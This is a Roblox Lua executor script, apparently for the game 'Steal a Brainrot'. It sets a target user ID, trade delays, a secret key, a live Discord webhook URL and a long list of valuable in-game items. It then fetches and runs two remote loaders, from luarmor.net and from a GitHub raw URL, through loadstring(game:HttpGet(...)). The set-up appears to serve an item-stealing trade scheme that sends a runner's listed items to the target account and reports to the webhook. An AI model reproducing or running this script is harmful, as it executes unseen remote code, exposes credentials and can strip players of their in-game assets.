getgenv().SECRET_KEY = "mrr_4d64e072b8ad4e04a0696c11fb41fa5a"
getgenv().TARGET_ID = 1718063814
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1491240838921982144/rO6yIYOU2s7mOC8oW7FmpKdCD4vV_ZgjGmW946Bd6ocOUK6vN3YA_98nbl-7pF0y9mQU"
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Los Tralaleritos"] = true,
    ["La Easter Grande"] = true,
    ["Noobini Pizzanini"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Los Tralaleritos"] = true,
    ["Las Tralaleritas"] = true,
    ["GOAT"] = true,
    ["Graipuss Medussi"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true,
    ["Fragola La La La"] = true,
    ["Extinct Matteo"] = true,
    ["Karker Sahur"] = true,
    ["Bunnyman"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Grande Combinasion"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["La Karkerkar Combinasion"] = true,
    ["La Vacca Prese Presente"] = true,
    ["Los Sweethearts"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Fishino Clownino"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["Los 67"] = true,
    ["Esok Sekolah"] = true,
    ["Rosetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["Snailo Clovero"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Los Combinasionas"] = true,
    ["Los Cupids"] = true,
    ["Donkeyturbo Express"] = true,
    ["Antonio"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Cloverat Clapat"] = true,
    ["La Lucky Grande"] = true,
    ["Lovin Rose"] = true,
    ["Pot Hotspot"] = true,
    ["Guerriro Digitale"] = true,
    ["Gold Gold Gold"] = true,
    ["Griffin"] = true,
    ["Noo my eggs"] = true,
    ["Bunny Bunny Bunny Sahur"] = true,
    ["Foxini Lanternini"] = true,
    ["1x1x1x1"] = true,
    ["Noo my examine"] = true,
    ["Los Karkeritos"] = true,
    ["Las Vaquitas Saturnitas"] = true,
    ["Los Spyderinis"] = true,
    ["Los Matteos"] = true,
    ["Los Cucarachas"] = true,
    ["Los Burritos"] = true,
    ["Rang Ring Bus"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Arcadopus"] = true,
    ["Los Quesadillas"] = true,
    ["Burrito Bandito"] = true,
    ["Mi Gatito"] = true,
    ["Pot Pumpkin"] = true,
    ["Quesadilla Crocodila"] = true,
    ["Horegini Boom"] = true,
    ["Nooo My Hotspot"] = true,
    ["Los Jobcitos"] = true,
    ["Tung Tung Tung Sahur"] = true,
    ["Coffin Tung Tung Tung Sahur"] = true,
    ["Blackhole Goat"] = true,
    ["Chachechi"] = true,
    ["Dul Dul Dul"] = true,
    ["Sammyni Spyderini"] = true,
    ["Karkerkar Kurkur"] = true,
    ["Noo my Heart"] = true,
    ["Los 25"] = true,
    ["Noo my Present"] = true,
    ["Noo my Candy"] = true,
    ["Cupid Hotspot"] = true,
    ["Naughty Naughty"] = true,
    ["Santa Hotspot"] = true,
    ["Telemorte"] = true,
    ["Please my Present"] = true,
    ["Reindeer Tralala"] = true,
    ["Zombie Tralala"] = true,
    ["Vulturino Skeletono"] = true,
    ["La Cucaracha"] = true,
    ["Extinct Tralalero"] = true,
    ["Jackorilla"] = true,
    ["Rocco Disco"] = true,
    ["Los Trios"] = true,
    ["Signore Carapace"] = true,
    ["Cloverat Clapat"] = true,
    ["Secret Lucky Block"] = true,
    ["Elefanto Frigo"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Antonio"] = true,
    ["Gold Gold Gold"] = true,
    ["Los Cupids"] = true,
    ["Fortunu And Cashuru"] = true,
    ["Tacorillo Crocodillo"] = true,
    ["Dug dug dug"] = true,
    ["Griffin"] = true,
    ["Celestial Pegasus"] = true,
    ["Foxini Lanternini"] = true,
    ["La Sahur Combinasion"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["Noo My Gold"] = true,
    ["Nacho Spyder"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ily123950/Vulkan/refs/heads/main/Tr"))()
end)
